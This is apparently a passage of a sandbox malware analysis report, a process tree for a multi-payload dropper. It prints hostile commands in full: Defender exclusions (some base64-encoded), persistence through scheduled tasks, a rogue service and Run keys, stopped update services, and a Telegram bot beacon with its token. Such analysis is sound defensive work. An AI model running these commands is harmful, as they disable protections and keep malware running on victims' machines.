    - System Location Discovery: System Language Discovery
    PID:23972
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:24052
- - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx
    PID:24140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:9300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:9472
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9924
- - C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe"
    3⤵
    - Checks computer location settings
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:24260
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-25_20-56.exe" & rd /s /q "C:\ProgramData\JDGIIDHJEBGI" & exit
      4⤵
      PID:7364
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:7444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 24260 -s 1860
      4⤵
      Program crash
      PID:7420
- - C:\Users\Admin\AppData\Local\Temp\Files\ovrflw.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ovrflw.exe"
    3⤵
    - Checks computer location settings
    - Adds Run key to start application
    PID:24416
  - - C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
      4⤵
      PID:24528
- - C:\Users\Admin\AppData\Local\Temp\Files\dtl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\dtl.exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:25436
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 25436 -s 1512
      4⤵
      Program crash
      PID:26604
- - C:\Users\Admin\AppData\Local\Temp\Files\NoMoreRansom.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NoMoreRansom.exe"
    3⤵
    - Adds Run key to start application
    PID:26912
- - C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe"
    3⤵
    PID:26980
- - C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:12040
- - C:\Users\Admin\AppData\Local\Temp\Files\sjkhjkh.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\sjkhjkh.exe"
    3⤵
    PID:7652
- - C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
    3⤵
    PID:27676
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
      4⤵
      PID:27704
    - - C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
        5⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:27788
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c mkdir "\\?\C:\Windows \System32"
        6⤵
        
        PID:34788
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows \System32\printui.exe"
        6⤵
        
        PID:34880
        
        C:\Windows \System32\printui.exe
        
        "C:\Windows \System32\printui.exe"
        7⤵
        Loads dropped DLL
        
        PID:34948
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
        8⤵
        
        PID:39684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:39752
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
        8⤵
        
        PID:31800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:15620
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c sc create x187347 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x187347\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x187347.dat" /f && sc start x187347
        8⤵
        
        PID:38496
        
        C:\Windows\system32\sc.exe
        
        sc create x187347 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
        9⤵
        Launches sc.exe
        
        PID:16076
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SYSTEM\CurrentControlSet\services\x187347\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x187347.dat" /f
        9⤵
        Modifies registry key
        
        PID:38268
        
        C:\Windows\system32\sc.exe
        
        sc start x187347
        9⤵
        Launches sc.exe
        
        PID:38316
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
        8⤵
        
        PID:39516
        
        C:\Windows\System32\console_zero.exe
        
        "C:\Windows\System32\console_zero.exe"
        9⤵
        
        PID:38384
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
        8⤵
        
        PID:16644
        
        C:\Windows\System32\bav64.exe
        
        "C:\Windows\System32\bav64.exe"
        9⤵
        
        PID:19468
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@GYHASOLS: Installed success.'});"
        8⤵
        
        PID:18604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@GYHASOLS: Installed success.'});"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:19512
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
        6⤵
        
        PID:34968
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 10 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:35036
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
      4⤵
      PID:27716
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 10 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:27820
- - C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"
    3⤵
    - Checks computer location settings
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:27916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAVQBrAG8AZABiAGMAZABjAGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAVQBrAG8AZABiAGMAZABjAGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AdgBhAHUAcgBuAGgAcQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAHYAYQB1AHIAbgBoAHEALgBlAHgAZQA=
      4⤵
      PID:33768
  - - C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"
      4⤵
      Drops file in Windows directory
      PID:34348
- - C:\Users\Admin\AppData\Local\Temp\Files\tt.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"
    3⤵
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:31560
  - - C:\Windows\sysmablsvr.exe
      C:\Windows\sysmablsvr.exe
      4⤵
      Modifies security service
      Windows security bypass
      Windows security modification
      System Location Discovery: System Language Discovery
      Suspicious behavior: SetClipboardViewer
      PID:33236
    - - C:\Users\Admin\AppData\Local\Temp\2792933412.exe
        
        C:\Users\Admin\AppData\Local\Temp\2792933412.exe
        5⤵
        
        PID:33872
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:34800
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:35164
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:34888
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:35284
    - - C:\Users\Admin\AppData\Local\Temp\2134729423.exe
        
        C:\Users\Admin\AppData\Local\Temp\2134729423.exe
        5⤵
        
        PID:19952
- - C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe"
    3⤵
    - Loads dropped DLL
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:33096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:35400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffce6fd46f8,0x7ffce6fd4708,0x7ffce6fd4718
        5⤵
        
        PID:35444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
        5⤵
        
        PID:35704
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 /prefetch:3
        5⤵
        
        PID:35720
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
        5⤵
        
        PID:35888
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        5⤵
        
        PID:36160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        5⤵
        
        PID:36168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
        5⤵
        
        PID:8324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
        5⤵
        
        PID:12652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
        5⤵
        
        PID:37136
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,3251470403002906625,2975774725275764819,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
        5⤵
        
        PID:39612
- - C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe"
    3⤵
    PID:35148
- - C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe"
    3⤵
    PID:35200
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 35200 -s 852
      4⤵
      Program crash
      PID:34336
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 35200 -s 1300
      4⤵
      Program crash
      PID:35464
- - C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
    3⤵
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:35296
  - - C:\Users\Admin\sysppvrdnvs.exe
      C:\Users\Admin\sysppvrdnvs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Checks computer location settings
      Windows security modification
      PID:36476
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:12332
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:12456
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        
        PID:12384
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:12716
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:12764
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:12812
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:12852
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:12940
- - C:\Users\Admin\AppData\Local\Temp\Files\88aext0k.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\88aext0k.exe"
    3⤵
    PID:36640
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:39060
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:39068
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:39088
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:39120
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:39208
- - C:\Users\Admin\AppData\Local\Temp\Files\VidsUsername.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\VidsUsername.exe"
    3⤵
    - Checks computer location settings
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:12428
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Recreation Recreation.bat & Recreation.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:12708
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:37080
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:37096
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:37468
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:37476
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 195197
        5⤵
        
        PID:37580
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "RESOLVEPHONESBLESSFRANK" Donated
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:37624
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Arthritis + ..\Canyon + ..\Knights + ..\Movies + ..\Sequence + ..\Nascar + ..\Solve + ..\Cio + ..\Strategy + ..\Amounts + ..\Hans + ..\America + ..\Provincial + ..\Downtown + ..\Browser + ..\Afford + ..\Info + ..\Ll + ..\Intersection + ..\Rj + ..\Poetry + ..\Reality + ..\Cliff l
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:37664
    - - C:\Users\Admin\AppData\Local\Temp\195197\Earl.pif
        
        Earl.pif l
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        
        PID:37700
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:37728
- - C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:12888
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:12960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 12888 -s 256
      4⤵
      Program crash
      PID:13056
- - C:\Users\Admin\AppData\Local\Temp\Files\DivineDialogue.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\DivineDialogue.exe"
    3⤵
    - Checks computer location settings
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:13204
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Prerequisite Prerequisite.bat & Prerequisite.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:13384
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:15356
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        
        PID:8428
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:40568
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        5⤵
        
        PID:4968
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 115839
        5⤵
        
        PID:4832
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "ISTTRANSACTIONSCONFCOMMENTARY" Grew
        5⤵
        
        PID:40936
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Butter + ..\Community + ..\Efficiently + ..\Tyler + ..\Seas + ..\California + ..\Skip + ..\Publisher + ..\Disappointed + ..\We + ..\Ll + ..\Time + ..\Terrible + ..\Anal + ..\Fleece + ..\Always + ..\Tcp l
        5⤵
        
        PID:3988
    - - C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif
        
        Leaving.pif l
        5⤵
        
        PID:8840
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:8744
- - C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:13476
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4DB7.tmp\4DB8.tmp\4DC8.bat C:\Users\Admin\AppData\Local\Temp\Files\9402.tmp.exe"
      4⤵
      PID:13532
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13548
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13568
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13584
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13600
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13628
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13644
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13660
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13676
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13716
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13824
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13840
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13880
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:13932
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14076
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14212
